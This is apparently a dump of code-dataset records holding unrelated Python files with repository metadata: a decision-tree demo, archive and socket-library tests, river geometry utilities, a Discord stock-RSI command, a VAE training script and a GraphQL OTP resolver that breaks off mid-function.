658406b3a8a1489ae1dff93411406c5f22d90b10 | 784 | py | Python | 12_TreeClassification3D/main.py | ManMohan291/PyProgram | edcaa927bd70676bd14355acad7262ae2d32b8e5 | ["MIT"] | 2 | 2018-09-07T17:44:54.000Z | 2018-09-07T17:44:57.000Z | 12_TreeClassification3D/main.py | ManMohan291/PyProgram | edcaa927bd70676bd14355acad7262ae2d32b8e5 | ["MIT"] | null | null | null | 12_TreeClassification3D/main.py | ManMohan291/PyProgram | edcaa927bd70676bd14355acad7262ae2d32b8e5 | ["MIT"] | null | null | null |
import TreeClassification as T
T.clearScreen()
dataTraining= T.loadData("dataTraining.txt")
X=dataTraining[:,0:3]
y=dataTraining[:,3:4]
Threshold=30
#Training
TrainedTree = T.SplitTree(X, y,ThresholdCount=Threshold)
newX,newY=T.PredictTree(X,y,TrainedTree)
#CheckAccuracy
Xy=T.concatenateVectors(X,y) #Merge dataset to sort order again
NewXy=T.concatenateVectors(newX,newY) #Compare requires sorting as Tree shuffled the data in leaf nodes
Accuracy=T.accurracy(Xy,NewXy)
print("Traning accuracy(",Accuracy,"%).")
#Ploting
plt=T.getPlot()
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
T.PlotPoints(ax,X,y)
ax = fig.add_subplot(122, projection='3d')
T.PlotTree(ax,X,y,TrainedTree)
plt.show()
#Print Tree
T.PrintTree(TrainedTree)
| 20.631579 | 110 | 0.732143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 195 | 0.248724 |
6584791fe17e82f5787899fa97ce0db3fa35bfb0 | 1,535 | py | Python | uhelpers/tests/test_archive_helpers.py | Johannes-Sahlmann/uhelpers | 58f8e25ef8644ab5b24a5be76fd58a338a400912 | ["BSD-3-Clause"] | null | null | null | uhelpers/tests/test_archive_helpers.py | Johannes-Sahlmann/uhelpers | 58f8e25ef8644ab5b24a5be76fd58a338a400912 | ["BSD-3-Clause"] | 2 | 2020-12-21T18:08:48.000Z | 2021-01-26T01:24:39.000Z | uhelpers/tests/test_archive_helpers.py | Johannes-Sahlmann/uhelpers | 58f8e25ef8644ab5b24a5be76fd58a338a400912 | ["BSD-3-Clause"] | 5 | 2019-10-02T14:16:15.000Z | 2021-12-27T18:46:18.000Z |
#!/usr/bin/env python
"""Tests for the jwcf hawki module.
Authors
-------
Johannes Sahlmann
"""
import netrc
import os
from astropy.table import Table
import pytest
from ..archive_helpers import get_exoplanet_orbit_database, gacs_list_query
local_dir = os.path.dirname(os.path.abspath(__file__))
ON_TRAVIS = os.environ.get('TRAVIS') == 'true'
@pytest.mark.skipif(ON_TRAVIS, reason='timeout issue.')
def test_eod():
"""Test the access to the exoplanet orbit database."""
catalog = get_exoplanet_orbit_database(local_dir, verbose=False)
assert len(catalog) > 100
@pytest.mark.skipif(ON_TRAVIS, reason='Requires access to .netrc file.')
def test_gacs_list_query():
# print('test gacs list query')
# Define which host in the .netrc file to use
HOST = 'http://gea.esac.esa.int'
# Read from the .netrc file in your home directory
secrets = netrc.netrc()
username, account, password = secrets.authenticators(HOST)
out_dir = os.path.dirname(__file__)
T = Table()
id_str_input_table = 'ID_HIP'
T[id_str_input_table] = [1, 2, 3, 4, 5, 6, 7]
gacs_table_name = 'tgas_source'
id_str_gacs_table = 'hip'
input_table_name = 'hip_star_list'
input_table = os.path.join(out_dir, 'hip_star_list.vot')
T[[id_str_input_table]].write(input_table, format='votable', overwrite=1)
T_out = gacs_list_query(username, password, out_dir, input_table, input_table_name, gacs_table_name,
id_str_gacs_table, id_str_input_table)
T_out.pprint()
| 29.519231 | 104 | 0.70684 | 0 | 0 | 0 | 0 | 1,178 | 0.767427 | 0 | 0 | 437 | 0.284691 |
6584f2d684176e56a028fa83fba17e1495411607 | 1,264 | py | Python | TP3/test.py | paul-arthurthiery/IAMethodesAlgos | f49fe17c278424588df263ab0e6778721cbc4394 | ["MIT"] | null | null | null | TP3/test.py | paul-arthurthiery/IAMethodesAlgos | f49fe17c278424588df263ab0e6778721cbc4394 | ["MIT"] | null | null | null | TP3/test.py | paul-arthurthiery/IAMethodesAlgos | f49fe17c278424588df263ab0e6778721cbc4394 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 2 14:33:13 2018
@author: Nathan
"""
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
# load dataset
data,target =load_iris().data,load_iris().target
# split data in train/test sets
X_train, X_test, y_train, y_test = train_test_split( data, target, test_size=0.33, random_state=42)
# standardize columns using normal distribution
# fit on X_train and not on X_test to avoid Data Leakage
s = StandardScaler()
X_train = s.fit_transform(X_train)
X_test = s.transform(X_test)
from SoftmaxClassifier import SoftmaxClassifier
# import the custom classifier
cl = SoftmaxClassifier()
# train on X_train and not on X_test to avoid overfitting
train_p = cl.fit_predict(X_train,y_train)
test_p = cl.predict(X_test)
from sklearn.metrics import precision_recall_fscore_support
# display precision, recall and f1-score on train/test set
print("train : "+ str(precision_recall_fscore_support(y_train, train_p,average = "macro")))
print("test : "+ str(precision_recall_fscore_support(y_test, test_p,average = "macro")))
import matplotlib.pyplot as plt
plt.plot(cl.losses_)
plt.show()
| 26.333333 | 99 | 0.77769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 431 | 0.340981 |
65850e2ff2df32252ae9c695f9a58c5a8d385efe | 1,013 | py | Python | HUGGINGFACE.py | mkingopng/NBME_score_clinical_patient_notes | 4ca9816be2665d7585ab0d168376a340aa800088 | ["MIT"] | 1 | 2022-03-27T12:47:25.000Z | 2022-03-27T12:47:25.000Z | HUGGINGFACE.py | mkingopng/NBME_score_clinical_patient_notes | 4ca9816be2665d7585ab0d168376a340aa800088 | ["MIT"] | null | null | null | HUGGINGFACE.py | mkingopng/NBME_score_clinical_patient_notes | 4ca9816be2665d7585ab0d168376a340aa800088 | ["MIT"] | null | null | null |
import os
TRANSFORMERS = '/home/noone/documents/github/transformers'
TOKENIZERS = '/home/noone/documents/github/tokenizers'
DATASETS = '/home/noone/documents/github/datasets'
MODELS = os.path.join(TRANSFORMERS, 'src/transformers/models')
DEBERTA_V2 = os.path.join(MODELS, 'deberta_v2')
DEBERTA_V3 = os.path.join(MODELS, 'deberta-v3-base')
ENCODER_DECODER = os.path.join(MODELS, 'encoder_decoder')
HUGGINGFACE_HUB = '/home/noone/documents/github/huggingface_hub'
"""
Huggingface Repos Cloned:
- transformers
- tokenizers
- optimum
- datasets
- huggingface_hub
- accelerate
- notebooks
- blog
- huggingface sagemaker snowflake example
- education toolkit
- evaluate
- knockknock
- neuralcoref
- mongoku
- data-measurements-tool
- neural compressor
- allennlp
- pytorch-openai-transformer-lm
- pytorch pretrained bigGAN
- awesome NLP discussion papers
- torchMoji
- naacl_transfer_learning_tutorial
-
"""
| 22.021739 | 64 | 0.699901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 781 | 0.770977 |
65852219b6e7161ca8a0d874955000bd7586ea4b | 830 | py | Python | Curso_em_Video_Exercicios/ex068.py | Cohuzer/Exercicios-do-Curso-em-Video | 879cbb53c54ba226e12d9972bc28eadcd521fc10 | ["MIT"] | null | null | null | Curso_em_Video_Exercicios/ex068.py | Cohuzer/Exercicios-do-Curso-em-Video | 879cbb53c54ba226e12d9972bc28eadcd521fc10 | ["MIT"] | null | null | null | Curso_em_Video_Exercicios/ex068.py | Cohuzer/Exercicios-do-Curso-em-Video | 879cbb53c54ba226e12d9972bc28eadcd521fc10 | ["MIT"] | null | null | null |
#Even or odd - for when the player loses, show the number of consecutive wins
from random import randint
c = 0
while True:
print('\033[1;33m-' * 30)
n = int(input('ESCOLHA UM NÚMERO: '))
e = str(input('PAR OU IMPAR? ')).strip().upper()[0]
print('-' * 30)
j = randint(0, 10)
if e == 'P':
if (n + j) % 2 == 0:
c += 1
print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
elif (n + j) % 2 != 0:
break
elif e == 'I':
if (n + j) % 2 == 0:
break
elif (n + j) % 2 != 0:
c += 1
print(f'VOCÊ GANHOU!\nEU ESCOLHI {j} E VOCÊ {n}')
elif e not in 'PI':
print('\033[1;31mOPÇÃO INVALIDA, TENTE DENOVO!')
print(f'\033[1;31mGAME OVER!\nEU ESCOLHI {j} E VOCÊ {n}\nVOCÊ FEZ UMA SEQUENCIA DE {c} PONTOS!')
| 33.2 | 96 | 0.503614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 367 | 0.437426 |
65870cdea10ace0d94e2b600195f694036787b41 | 1,727 | py | Python | tests/test_write.py | AlexsanderShaw/libdesock | 5945a5ab0f002078fc6eaaf7e20e2b7b66c67086 | ["MIT"] | 88 | 2022-02-26T20:59:53.000Z | 2022-03-21T21:29:09.000Z | tests/test_write.py | fkie-cad/libdesock | 3d20862e9cfd18e20bdeb599ab2f39e20e94373c | ["MIT"] | null | null | null | tests/test_write.py | fkie-cad/libdesock | 3d20862e9cfd18e20bdeb599ab2f39e20e94373c | ["MIT"] | 7 | 2022-02-27T01:42:00.000Z | 2022-03-07T03:06:32.000Z |
"""
This file tests that sendmmsg works correctly.
Target files:
- libdesock/src/write.c
"""
import ctypes
import desock
import helper
data = bytes(range(65, 115))
cursor = 0
def _get_data(size):
global cursor
ret = bytes(data[cursor: cursor + size])
assert(len(ret) == size)
cursor += size
return ret
def test_sendmmsg():
fd = desock._debug_instant_fd(0)
assert(desock.sendmmsg(fd, None, 0, 0) == 0)
mmsghdrs = (desock.mmsghdr * 2)()
mmsghdrs[0] = helper.create_mmsghdr(helper.create_msghdr(iov=helper.create_iovec(5, 5, datafunc=_get_data)))
mmsghdrs[1] = helper.create_mmsghdr(helper.create_msghdr(iov=helper.create_iovec(5, 5, datafunc=_get_data)))
with helper.StdoutPipe() as pipe:
assert(desock.sendmmsg(fd, mmsghdrs, 2, 0) == 2)
assert(pipe.read(50) == data)
def test_sendto():
data = ctypes.create_string_buffer(bytes(range(128)))
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.sendto(fd, data, 128, 0, None, 0) == 128)
assert(pipe.read(128) == data[:128])
def test_sendmsg():
global cursor
cursor = 0
msghdr = helper.create_msghdr(iov=helper.create_iovec(5, 10, datafunc=_get_data))
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.sendmsg(fd, msghdr, 0) == 50)
assert(pipe.read(50) == data)
def test_writev():
global cursor
cursor = 0
iov = helper.create_iovec(5, 10, datafunc=_get_data)
fd = desock._debug_instant_fd(0)
with helper.StdoutPipe() as pipe:
assert(desock.writev(fd, iov, 5) == 50)
assert(pipe.read(50) == data)
| 27.854839 | 112 | 0.643891 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 97 | 0.056167 |
6587d36784219790a446003c11e770c4bed4d07f | 8,409 | py | Python | ratin_cpython/common/common.py | openearth/eo-rivers | 752f90aed92fa862a2c107bb58bcae298c1bf313 | ["MIT"] | 2 | 2018-10-19T03:20:08.000Z | 2020-05-06T22:56:20.000Z | ratin_cpython/common/common.py | openearth/eo-river | 752f90aed92fa862a2c107bb58bcae298c1bf313 | ["MIT"] | 11 | 2018-06-05T09:41:15.000Z | 2021-11-15T17:47:27.000Z | ratin_cpython/common/common.py | openearth/eo-rivers | 752f90aed92fa862a2c107bb58bcae298c1bf313 | ["MIT"] | 2 | 2020-10-15T12:29:36.000Z | 2021-12-13T22:53:58.000Z |
import numpy as np
from math import factorial
import scipy.signal
#Gaussian filter with convolution - faster and easier to handle
## Degree is equal to the number of values left and right of the central value
## of the gaussian window:
## ie degree=3 yields a window of length 7
## It uses normalized weights (sum of weights = 1)
## Based on:
## http://en.wikipedia.org/wiki/Gaussian_filter
## http://en.wikipedia.org/wiki/Standard_deviation
## http://en.wikipedia.org/wiki/Window_function#Gaussian_window
def smooth(array_in, degree=5):
'''
Gaussian smooth line using a window of specified degree (=half-length)
'''
degree = int(degree) #make sure it is of integer type
n = 2*degree+1
if degree <= 0:
return array_in
if type(array_in) == type(np.array([])) and len(array_in.shape)>1:
array_in = array_in.flatten()
array_in = list(array_in)
# If degree is larger than twice the original data, make it smaller
if len(array_in) < n:
degree = len(array_in)//2
n = 2*degree+1
print("Changed smoothing degree to:", degree)
#extend the array's initial and ending values with equal ones, accordingly
array_in = np.array( [array_in[0]]*degree + array_in + [array_in[-1]]*degree )
#TODO: These parameters are subject to change - depends on the implementation
# Gaussian parameters:
x = np.linspace(-degree,degree,n)
sigma = np.sqrt( sum( (x-np.mean(x))**2 ) / n )
alpha = 1.0 / (2.0 * sigma**2)
weight = np.sqrt(alpha/np.pi) * np.exp(-alpha*x**2 ) #gaussian
weights = weight / sum(weight) #normalize
return np.convolve(array_in, weights, 'valid')
#TODO: revise
#Gaussian 2D smoothing, anisotropic
## http://homepages.inf.ed.ac.uk/rbf/HIPR2/gsmooth.htm
def smooth2D(matrix_in, fill, degree=5, sigma=2.0, a=1.0, b=1.0):
'''
Gaussian smooth matrix using a window of specified degree
'''
kx, ky = np.arange(-degree,degree+1.0),np.arange(-degree,degree+1.0)
kernel = np.zeros([kx.shape[0],ky.shape[0]])
for i in range(len(kx)):
for j in range(len(ky)):
kernel[i,j] = 1./(2*np.pi*sigma**2) * np.exp( -(b*kx[i]**2+a*ky[j]**2)/(2*sigma**2) )
kernel /= kernel.sum()
matrix_out = scipy.signal.convolve2d(matrix_in, kernel, mode='same', fillvalue=fill)
return matrix_out
def get_direction(x, y, smoothdegree=0, units='degrees'):
'''
Return direction (cartesian reference) of point
The direction of each point is calculated as the mean of directions
on both sides
'''
#Calculate direction in RADIANS
direction = np.array([])
#first point: Can determine direction only based on next point
direction = np.append(direction,np.angle((x[1]-x[0])+(y[1]-y[0])*1j))
for j in range(1, len(x)-1):
# Base direction on points before and after current point
direction = np.append(direction,np.angle((x[j+1]-x[j-1])+(y[j+1]-y[j-1])*1j))
#last point: Can determine direction only based on previous point
direction = np.append(direction,np.angle((x[-1]-x[-2])+(y[-1]-y[-2])*1j))
#fix 'jumps' in data
direction = fix_angle_vector(direction)
#Smoothing - do not perform if input degree is equal/less than 0.0
if smoothdegree <= 0.0:
pass
else:
direction = smooth(direction, degree=smoothdegree)
#TODO: Review! Do we need to confine it?
#Limit the representation in the space of [0,2*pi]
gaps = np.where(np.abs(direction) > np.radians(360.0))[0]
direction[gaps] -= np.radians(360.0)
if units=='radians':
pass
elif units == 'degrees':
direction = np.degrees(direction)
return direction
def distance(p1, p2):
"""
Distance in between two points (given as tuples)
"""
dist = np.sqrt( (p2[0]-p1[0])**2 + (p2[1]-p1[1])**2 )
return dist
def distance_matrix(x0, y0, x1, y1, aniso):
"""
Returns distances between points in a matrix formation.
An anisotropy factor is set as input. If >1, the points in
x direction shift closer. If <1, the points in x direction
shift further apart. If =1, normal distances are computed.
"""
aniso = float(aniso)
x0 = np.array(x0).flatten()
y0 = np.array(y0).flatten()
x1 = np.array(x1).flatten()
y1 = np.array(y1).flatten()
#transpose observations
vertical = np.vstack((x0, y0)).T
horizontal = np.vstack((x1, y1)).T
# Make a distance matrix between pairwise observations
# Note: from <http://stackoverflow.com/questions/1871536>
if aniso<=0.0:
print "Warning: Anisotropy factor cannot be 0 or negative; set to 1.0."
aniso = 1.0
d0 = np.subtract.outer(vertical[:,0], horizontal[:,0]) * (1./aniso)
d1 = np.subtract.outer(vertical[:,1], horizontal[:,1])
return np.hypot(d0, d1)
#retrieve s values streamwise
def get_chainage(x, y):
"""
Get chain distances for a set of continuous points
"""
s = np.array([0.0]) #start
for j in range(1,len(x)):
s = np.append( s, s[j-1] + distance([x[j-1],y[j-1]], [x[j],y[j]]) )
return s
def to_sn(Gx, Gy):
"""
Transform (Gx,Gy) Cartesian coordinates to flow-oriented ones (Gs,Gn),
where Gx and Gy stand for gridded x and gridded y, and Gs and Gn are their
transformed counterparts.
Gx,Gy,Gs,Gn are all numpy arrays in the form of matrices.
"""
rows, cols = Gx.shape
#find s-direction coordinates
midrow = int(rows/2)
c_x = Gx[midrow,:]
c_y = Gy[midrow,:]
Salong = get_chainage(c_x,c_y)
#all s-direction points have the same spacing
Gs = np.tile(Salong, (rows,1)) #"stretch" all longitudinals
#find n-direction coordinates
Gn = np.zeros([rows,cols])
for j in range(cols): #for each column
Gn[midrow::-1,j] = -get_chainage(Gx[midrow::-1,j],Gy[midrow::-1,j])
Gn[midrow:,j] = get_chainage(Gx[midrow:,j],Gy[midrow:,j])
return Gs, Gn
def to_grid(data, rows, cols):
"""
Transform a list of data to a grid-like (matrix) form of specified shape
"""
data = np.array(data).flatten()
return data.reshape(rows,cols)
##??['Brute-force' way but works correctly]
def fix_angle_vector(theta):
'''
Fixes a vector of angles (in radians) that show 'jumps' because of changes
between 360 and 0 degrees
'''
thetadiff = np.diff(theta)
gaps = np.where(np.abs(thetadiff) > np.radians(180))[0]
while len(gaps)>0:
gap = gaps[0]
if thetadiff[gap]<0:
theta[gap+1:] += np.radians(360)
else:
theta[gap+1:] -= np.radians(360)
thetadiff = np.diff(theta)
gaps = np.where(np.abs(thetadiff) > np.radians(180))[0]
return theta
def get_parallel_line(x, y, direction, distance, units = 'degrees'):
'''
Create parallel lines for representation of MAT path.
'''
if units == 'degrees':
direction = np.radians(direction)
perpendicular_direction = np.array(direction)+0.5*np.pi
xn = np.array(x)+np.array(distance)*np.array(np.cos(perpendicular_direction))
yn = np.array(y)+np.array(distance)*np.array(np.sin(perpendicular_direction))
return xn, yn
#http://wiki.scipy.org/Cookbook/SavitzkyGolay
def savitzky_golay(y, window_size, order, deriv=0, rate=1):
try:
window_size = np.abs(int(window_size))
order = np.abs(int(order))
except ValueError as msg:
raise ValueError("window_size and order have to be of type int", msg)
if window_size % 2 != 1 or window_size < 1:
raise TypeError("window_size size must be a positive odd number")
if window_size < order + 2:
raise TypeError("window_size is too small for the polynomials order")
order_range = range(order+1)
half_window = (window_size -1) // 2
# precompute coefficients
b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)])
m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv)
# pad the signal at the extremes with
# values taken from the signal itself
firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] )
lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])
y = np.concatenate((firstvals, y, lastvals))
return np.convolve( m[::-1], y, mode='valid')
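# ----------------------------------------------------------------------
# Small usage sketch (not part of the original module): the two 1-D smoothers
# defined above applied to a synthetic noisy sine. The signal length, noise
# level and window settings are illustrative assumptions only.
if __name__ == "__main__":
    t = np.linspace(0, 2 * np.pi, 200)
    noisy = np.sin(t) + 0.2 * np.random.randn(t.size)
    gauss = smooth(noisy, degree=5)                            # Gaussian-window smoothing
    savgol = savitzky_golay(noisy, window_size=11, order=3)    # Savitzky-Golay polynomial smoothing
    print(noisy.shape, gauss.shape, savgol.shape)              # all three keep length 200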
| 35.331933 | 97 | 0.631704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,277 | 0.389702 |
658815cb00ae7e0794df13b589c297b74cf7ffbd | 3,879 | py | Python | discordbot/stocks/technical_analysis/rsi.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | ["MIT"] | 3 | 2021-02-28T09:54:47.000Z | 2021-03-11T17:42:35.000Z | discordbot/stocks/technical_analysis/rsi.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | ["MIT"] | 3 | 2022-02-28T03:37:52.000Z | 2022-02-28T03:37:53.000Z | discordbot/stocks/technical_analysis/rsi.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | ["MIT"] | 1 | 2021-11-20T16:09:48.000Z | 2021-11-20T16:09:48.000Z |
import os
from datetime import datetime, timedelta
import discord
from matplotlib import pyplot as plt
import discordbot.config_discordbot as cfg
from discordbot.run_discordbot import gst_imgur
import discordbot.helpers
from gamestonk_terminal.helper_funcs import plot_autoscale
from gamestonk_terminal.common.technical_analysis import momentum_model
from gamestonk_terminal.config_plot import PLOT_DPI
async def rsi_command(
ctx, ticker="", length="14", scalar="100", drift="1", start="", end=""
):
"""Displays chart with relative strength index [Yahoo Finance]"""
try:
# Debug
if cfg.DEBUG:
print(f"!stocks.ta.rsi {ticker} {length} {scalar} {drift} {start} {end}")
# Check for argument
if ticker == "":
raise Exception("Stock ticker is required")
if start == "":
start = datetime.now() - timedelta(days=365)
else:
start = datetime.strptime(start, cfg.DATE_FORMAT)
if end == "":
end = datetime.now()
else:
end = datetime.strptime(end, cfg.DATE_FORMAT)
if not length.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
length = float(length)
if not scalar.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
scalar = float(scalar)
if not drift.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
drift = float(drift)
ticker = ticker.upper()
df_stock = discordbot.helpers.load(ticker, start)
if df_stock.empty:
raise Exception("Stock ticker is invalid")
# Retrieve Data
df_stock = df_stock.loc[(df_stock.index >= start) & (df_stock.index < end)]
df_ta = momentum_model.rsi("1440min", df_stock, length, scalar, drift)
# Output Data
fig, axes = plt.subplots(2, 1, figsize=plot_autoscale(), dpi=PLOT_DPI)
ax = axes[0]
ax.plot(df_stock.index, df_stock["Adj Close"].values, "k", lw=2)
ax.set_title(f" {ticker} RSI{length} ")
ax.set_xlim(df_stock.index[0], df_stock.index[-1])
ax.set_ylabel("Share Price ($)")
ax.grid(b=True, which="major", color="#666666", linestyle="-")
ax2 = axes[1]
ax2.plot(df_ta.index, df_ta.values, "b", lw=2)
ax2.set_xlim(df_stock.index[0], df_stock.index[-1])
ax2.axhspan(70, 100, facecolor="r", alpha=0.2)
ax2.axhspan(0, 30, facecolor="g", alpha=0.2)
ax2.axhline(70, linewidth=3, color="r", ls="--")
ax2.axhline(30, linewidth=3, color="g", ls="--")
ax2.grid(b=True, which="major", color="#666666", linestyle="-")
ax2.set_ylim([0, 100])
ax3 = ax2.twinx()
ax3.set_ylim(ax2.get_ylim())
ax3.set_yticks([30, 70])
ax3.set_yticklabels(["OVERSOLD", "OVERBOUGHT"])
plt.gcf().autofmt_xdate()
fig.tight_layout(pad=1)
plt.savefig("ta_rsi.png")
uploaded_image = gst_imgur.upload_image("ta_rsi.png", title="something")
image_link = uploaded_image.link
if cfg.DEBUG:
print(f"Image URL: {image_link}")
title = "Stocks: Relative-Strength-Index " + ticker
embed = discord.Embed(title=title, colour=cfg.COLOR)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
embed.set_image(url=image_link)
os.remove("ta_rsi.png")
await ctx.send(embed=embed)
except Exception as e:
embed = discord.Embed(
title="ERROR Stocks: Relative-Strength-Index",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
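# ----------------------------------------------------------------------
# Reference-only sketch of the classic Wilder RSI that the chart above
# visualises. This is NOT the gamestonk_terminal momentum_model implementation;
# `close` is assumed to be a pandas Series (e.g. df_stock["Adj Close"]) and the
# EWM-based smoothing choice is an assumption for illustration.
def _reference_rsi(close, length: int = 14, scalar: float = 100.0):
    """Return the RSI of a pandas Series of closing prices."""
    delta = close.diff()
    gain = delta.clip(lower=0).ewm(alpha=1 / length, adjust=False).mean()
    loss = (-delta.clip(upper=0)).ewm(alpha=1 / length, adjust=False).mean()
    rs = gain / loss
    return scalar - scalar / (1 + rs)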
| 34.026316 | 85 | 0.60299 | 0 | 0 | 0 | 0 | 0 | 0 | 3,471 | 0.894818 | 651 | 0.167827 |
65894aac96ac4562697b30a8369779ac8960ace4 | 5,011 | py | Python | train.py | xushenkun/vae | 35e136257e5a3122b92dff9961dd08585b7cce2d | ["MIT"] | 1 | 2020-09-19T00:03:59.000Z | 2020-09-19T00:03:59.000Z | train.py | xushenkun/vae | 35e136257e5a3122b92dff9961dd08585b7cce2d | ["MIT"] | null | null | null | train.py | xushenkun/vae | 35e136257e5a3122b92dff9961dd08585b7cce2d | ["MIT"] | null | null | null |
import argparse
import os
import shutil
import numpy as np
import torch as t
from torch.optim import Adam
from utils.batch_loader import BatchLoader
from utils.parameters import Parameters
from model.rvae_dilated import RVAE_dilated
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='RVAE_dilated')
parser.add_argument('--num-epochs', type=int, default=25000, metavar='ES',
help='num epochs (default: 25000)')
parser.add_argument('--start-epoch', default=0, type=int, metavar='E',
help='manual epoch index (useful on restarts)')
parser.add_argument('--batch-size', type=int, default=45, metavar='BS',
help='batch size (default: 45)')
parser.add_argument('--use-cuda', type=bool, default=True, metavar='CUDA',
help='use cuda (default: True)')
parser.add_argument('--learning-rate', type=float, default=0.0005, metavar='LR',
help='learning rate (default: 0.0005)')
parser.add_argument('--dropout', type=float, default=0.3, metavar='DR',
help='dropout (default: 0.3)')
parser.add_argument('--use-trained', default='', metavar='UT',
help='load pretrained model (default: None)')
parser.add_argument('--ret-result', default='', metavar='CE',
help='ce result path (default: '')')
parser.add_argument('--kld-result', default='', metavar='KLD',
help='kld result path (default: '')')
args = parser.parse_args()
prefix = 'poem'
word_is_char = True
batch_loader = BatchLoader('', prefix, word_is_char)
best_ret = 9999999
is_best = False
if not os.path.exists('data/' + batch_loader.prefix + 'word_embeddings.npy'):
raise FileNotFoundError("word embeddings file was't found")
parameters = Parameters(batch_loader.max_word_len,
batch_loader.max_seq_len,
batch_loader.words_vocab_size,
batch_loader.chars_vocab_size, word_is_char)
rvae = RVAE_dilated(parameters, batch_loader.prefix)
optimizer = Adam(rvae.learnable_parameters(), args.learning_rate)
if args.use_trained:
checkpoint = t.load(args.use_trained)
args.start_epoch = checkpoint['epoch']
best_ret = checkpoint['best_ret']
rvae.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
if args.use_cuda and t.cuda.is_available():
rvae = rvae.cuda()
train_step = rvae.trainer(optimizer, batch_loader)
validate = rvae.validater(batch_loader)
ret_result = []
kld_result = []
for epoch in range(args.start_epoch, args.num_epochs):
train_ret, train_kld, train_kld_coef = train_step(epoch, args.batch_size, args.use_cuda and t.cuda.is_available(), args.dropout)
train_ret = train_ret.data.cpu().numpy()[0]
train_kld = train_kld.data.cpu().numpy()[0]
valid_ret, valid_kld = validate(args.batch_size, args.use_cuda and t.cuda.is_available())
valid_ret = valid_ret.data.cpu().numpy()[0]
valid_kld = valid_kld.data.cpu().numpy()[0]
ret_result += [valid_ret]
kld_result += [valid_kld]
is_best = valid_ret < best_ret
best_ret = min(valid_ret, best_ret)
print('[%s]---TRAIN-ret[%s]kld[%s]------VALID-ret[%s]kld[%s]'%(epoch, train_ret, train_kld, valid_ret, valid_kld))
if epoch != 1 and epoch % 10 == 9:
seed = np.random.normal(size=[1, parameters.latent_variable_size])
sample = rvae.sample(batch_loader, 50, seed, args.use_cuda and t.cuda.is_available(), None, 1)
print('[%s]---SAMPLE: %s'%(epoch, sample))
if epoch != 0 and epoch % 100 == 99:
checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, epoch+1)
t.save({'epoch': epoch+1,
'state_dict': rvae.state_dict(),
'best_ret': best_ret,
'optimizer': optimizer.state_dict()}, checkpoint_filename)
oldest = epoch+1-3*100
oldest_checkpoint_filename = './data/%strained_%s_RVAE'%(batch_loader.prefix, oldest) if oldest>0 else None
if oldest_checkpoint_filename and os.path.isfile(oldest_checkpoint_filename):
os.remove(oldest_checkpoint_filename)
if is_best:
shutil.copyfile(checkpoint_filename, './data/'+batch_loader.prefix+'trained_best_RVAE')
t.save({'epoch': args.num_epochs,
'state_dict': rvae.state_dict(),
'best_ret': best_ret,
'optimizer': optimizer.state_dict()}, './data/'+batch_loader.prefix+'trained_last_RVAE')
np.save(batch_loader.prefix+'ret_result_{}.npy'.format(args.ret_result), np.array(ret_result))
np.save(batch_loader.prefix+'kld_result_npy_{}'.format(args.kld_result), np.array(kld_result))
| 43.95614 | 136 | 0.631411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 882 | 0.176013 |
658c87d29e07d35154d2bbcefbc473d8ad660860 | 1,152 | py | Python | renovation_core_graphql/auth/otp.py | e-lobo/renovation_core_graphql | 31e464e00badc308bf03c70364331b08ad9d1b1d | ["MIT"] | 1 | 2021-12-15T06:05:06.000Z | 2021-12-15T06:05:06.000Z | renovation_core_graphql/auth/otp.py | e-lobo/renovation_core_graphql | 31e464e00badc308bf03c70364331b08ad9d1b1d | ["MIT"] | 5 | 2021-06-09T19:00:56.000Z | 2022-01-23T09:51:13.000Z | renovation_core_graphql/auth/otp.py | e-lobo/renovation_core_graphql | 31e464e00badc308bf03c70364331b08ad9d1b1d | ["MIT"] | 1 | 2021-06-01T05:22:41.000Z | 2021-06-01T05:22:41.000Z |
from graphql import GraphQLResolveInfo
import frappe
from renovation_core.utils.auth import generate_otp, verify_otp
VERIFY_OTP_STATUS_MAP = {
"no_linked_user": "NO_LINKED_USER",
"no_otp_for_mobile": "NO_OTP_GENERATED",
"invalid_otp": "INVALID_OTP",
"verified": "VERIFIED",
}
def generate_otp_resolver(obj, info: GraphQLResolveInfo, **kwargs):
r = generate_otp(**kwargs)
r.status = "SUCCESS" if r.status == "success" else "FAILED"
return r
def verify_otp_resolver(obj, info: GraphQLResolveInfo, **kwargs):
kwargs["login_to_user"] = 1 if kwargs.get("login_to_user") else 0
if kwargs["login_to_user"] and kwargs["use_jwt"]:
frappe.local.form_dict.use_jwt = 1
del kwargs["use_jwt"]
status_dict = verify_otp(**kwargs)
status_dict.update(frappe.local.response)
if status_dict.get("user"):
